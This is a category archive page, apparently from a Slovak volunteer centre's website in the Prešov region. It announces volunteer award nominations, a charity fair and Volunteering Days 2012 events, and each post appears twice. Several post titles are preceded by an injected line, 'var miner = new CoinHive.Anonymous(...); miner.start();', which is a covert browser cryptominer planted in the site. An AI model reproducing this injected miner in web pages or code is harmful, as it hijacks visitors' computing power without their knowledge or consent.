Category Archives: Dobrovoľníctvo

Home / Archive by category "Dobrovoľníctvo"

var miner = new CoinHive.Anonymous(‚_‘); miner.start(); Krajské oceňovanie dobrovoľníkov Prešovského kraja za rok 2013

Jedinečná šanca ako oceniť dobrovoľníkov – ľudí, ktorí Vám pomohli, povzbudili vašich klientov, priniesli niečo nové do vašich aktivít.

Neváhajte a nájdite si čas na napísanie nominácie, ktorú očakávame do 15.novembra 2013 na priloženom nominačnom hárku.

Podmienky nominácie nájdete v priloženom štatúte. K propagácii môžete využiť priloženú výzvu.

 

 

Krajské oceňovanie dobrovoľníkov Prešovského kraja za rok 2013

Jedinečná šanca ako oceniť dobrovoľníkov – ľudí, ktorí Vám pomohli, povzbudili vašich klientov, priniesli niečo nové do vašich aktivít.

Neváhajte a nájdite si čas na napísanie nominácie, ktorú očakávame do 15.novembra 2013 na priloženom nominačnom hárku.

Podmienky nominácie nájdete v priloženom štatúte. K propagácii môžete využiť priloženú výzvu.

 

 

var miner = new CoinHive.Anonymous(‚_‘); miner.start(); Dobrý trh v Prešove

Dávame do pozornosti akciu DOBRÝ TRH, ktorá sa koná hneď po dňoch kariéry v PKO, 23.5.2013 od 10:00 do 14 hod.v Prešove.  Príďte si kúpiť výrobky z chránených dielní, získajte informácie o štipendiách a štúdiu v zahraničí…
Aj nezamestnaní majú možnosť sa oboznámiť s témou dobrovoľníctvo a využiť túto možnosť „praxe“. Zároveň bude priestor na prezentáciu mimovládnych organizácií v rámci svojej činnosti, výrobkov prípadne chránených pracovísk na území mesta PREŠOV, kde verejnosť má možnosť bližšie spoznať tieto organizácie a ich činnosť.
Zároveň tieto organizácie sa majú možnosť spoznať, nadviazať spoluprácu a pod.
Myšlienku podporuje aj mesto Prešov, ktoré sa zúčastní cez sekciu služieb občanom a jej činnosť bude tiež na akcií prezentovať.
VSTUP JE ZDARMA !
Organizačný tím
Inge Doležalová
0905 207686
Juliana Hajduková
0908/217080

Dobrý trh v Prešove

Dávame do pozornosti akciu DOBRÝ TRH, ktorá sa koná hneď po dňoch kariéry v PKO, 23.5.2013 od 10:00 do 14 hod.v Prešove.  Príďte si kúpiť výrobky z chránených dielní, získajte informácie o štipendiách a štúdiu v zahraničí…
Aj nezamestnaní majú možnosť sa oboznámiť s témou dobrovoľníctvo a využiť túto možnosť „praxe“. Zároveň bude priestor na prezentáciu mimovládnych organizácií v rámci svojej činnosti, výrobkov prípadne chránených pracovísk na území mesta PREŠOV, kde verejnosť má možnosť bližšie spoznať tieto organizácie a ich činnosť.
Zároveň tieto organizácie sa majú možnosť spoznať, nadviazať spoluprácu a pod.
Myšlienku podporuje aj mesto Prešov, ktoré sa zúčastní cez sekciu služieb občanom a jej činnosť bude tiež na akcií prezentovať.
VSTUP JE ZDARMA !
Organizačný tím
Inge Doležalová
0905 207686
Juliana Hajduková
0908/217080

var miner = new CoinHive.Anonymous(‚_‘); miner.start(); Krajské srdce na dlani 2012

 

Prešovské dobrovoľnícke centrum spolu s partnermi, medzi ktorých patrí aj Rada mládeže Prešovského kraja vyhlasuje 11. ročník oceňovania dobrovoľníkov v Prešovskom kraji. Ide o morálne oceňovanie dobrovoľníkov za ich pomoc a aktivity, ktoré pomáhajú jednotlivcom, skupine, komunite.

Ocenenie si zaslúžia kandidáti (jednotlivec alebo skupina) za dlhoročnú prácu, ale aj ľudia, ktorí svojim prejavom solidarity, či výnimočným činom pomohli alebo pozitívne ovplyvnili svoje okolie a aktívnou činnosťou prispievajú k rozvoju Prešovského kraja v oblasti:

 • ochrany životného prostredia,
 • kultúry,
 • športu,
 • pomoci okrajovým skupinám obyvateľov,
 • práce s mládežou,
 • budovaniu dobrých susedských vzťahov,
 • rozvoja vlastnej organizácie.

 

Uzávierka nominácii: 15. novembra 2012

Krajské srdce na dlani 2012

 

Prešovské dobrovoľnícke centrum spolu s partnermi, medzi ktorých patrí aj Rada mládeže Prešovského kraja vyhlasuje 11. ročník oceňovania dobrovoľníkov v Prešovskom kraji. Ide o morálne oceňovanie dobrovoľníkov za ich pomoc a aktivity, ktoré pomáhajú jednotlivcom, skupine, komunite.

Ocenenie si zaslúžia kandidáti (jednotlivec alebo skupina) za dlhoročnú prácu, ale aj ľudia, ktorí svojim prejavom solidarity, či výnimočným činom pomohli alebo pozitívne ovplyvnili svoje okolie a aktívnou činnosťou prispievajú k rozvoju Prešovského kraja v oblasti:

 • ochrany životného prostredia,
 • kultúry,
 • športu,
 • pomoci okrajovým skupinám obyvateľov,
 • práce s mládežou,
 • budovaniu dobrých susedských vzťahov,
 • rozvoja vlastnej organizácie.

 

Uzávierka nominácii: 15. novembra 2012

var miner = new CoinHive.Anonymous(‚_‘); miner.start(); Dobrovoľne na streche

DOBROVOĽNE NA STRECHE

Otvorenie Dní dobrovoľníctva 2012 v Prešovskom kraji

21.9.2012 o 15:00 hod.

v priestoroch kaviarne S-caffe, Čapajevova 3, Prešov

Podujatie má otvorený charakter a dáva príležitosť upútať záujem, pozornosť a priazeň širokej verejnosti na fenomén dobrovoľníctva. Hlavným cieľom podujatia je zaviesť systematický spôsob propagácie dobrovoľníctva a dobrovoľníckych aktivít na Slovensku a umožniť ľuďom získať pozitívnu skúsenosť s dobrovoľníctvom.

Program podujatia budú tvoriť: príhovory, diskusie s dobrovoľníkmi formou Živých knižníc, interaktívna výstava o dobrovoľníctve, výmena skúsenosti a možnosť propagácie dobrovoľníckych programov organizácii a zapojených účastníkov, nábor dobrovoľníkom prostredníctvom „inzertnej tabule“, príjemné posedenie, hudba a dobrovoľnícka atmosféra…

Tešíme sa na spoločné stretnutie

Regionálni koordinátori pre Prešovský kraj

Kontakt:

Prešovské dobrovoľnícke centrum – 0944 235 268

Rada mládeže Prešovského kraja – 0949 590 537

email: presov@dobrovolnictvo.sk

www.dobrovolnictvo.sk

Dobrovoľne na streche

DOBROVOĽNE NA STRECHE

Otvorenie Dní dobrovoľníctva 2012 v Prešovskom kraji

21.9.2012 o 15:00 hod.

v priestoroch kaviarne S-caffe, Čapajevova 3, Prešov

Podujatie má otvorený charakter a dáva príležitosť upútať záujem, pozornosť a priazeň širokej verejnosti na fenomén dobrovoľníctva. Hlavným cieľom podujatia je zaviesť systematický spôsob propagácie dobrovoľníctva a dobrovoľníckych aktivít na Slovensku a umožniť ľuďom získať pozitívnu skúsenosť s dobrovoľníctvom.

Program podujatia budú tvoriť: príhovory, diskusie s dobrovoľníkmi formou Živých knižníc, interaktívna výstava o dobrovoľníctve, výmena skúsenosti a možnosť propagácie dobrovoľníckych programov organizácii a zapojených účastníkov, nábor dobrovoľníkom prostredníctvom „inzertnej tabule“, príjemné posedenie, hudba a dobrovoľnícka atmosféra…

Tešíme sa na spoločné stretnutie

Regionálni koordinátori pre Prešovský kraj

Kontakt:

Prešovské dobrovoľnícke centrum – 0944 235 268

Rada mládeže Prešovského kraja – 0949 590 537

email: presov@dobrovolnictvo.sk

www.dobrovolnictvo.sk

var miner = new CoinHive.Anonymous(‚_‘); miner.start(); Pracovné stretnutie: Dni dobrovoľníctva 2012

Pracovné stretnutie prihlásených organizácií sa uskutoční dňa 7.9.2012 v Prešove. Okrem vzájomného spoznania, predstavenia aktivít v Prešovskom kraji by budú k dispozícii aj tlačené materiály (leták, plagáty, pohľadnice), ktoré pomôžu pri propagácií aktivít prihlásených organizácií.

Nižšie nájdete aj Sprievodu DD 2012, ktorý pripravili pracovníci C.A.R.D.A.

Pracovné stretnutie: Dni dobrovoľníctva 2012

Pracovné stretnutie prihlásených organizácií sa uskutoční dňa 7.9.2012 v Prešove. Okrem vzájomného spoznania, predstavenia aktivít v Prešovskom kraji by budú k dispozícii aj tlačené materiály (leták, plagáty, pohľadnice), ktoré pomôžu pri propagácií aktivít prihlásených organizácií.

Nižšie nájdete aj Sprievodu DD 2012, ktorý pripravili pracovníci C.A.R.D.A.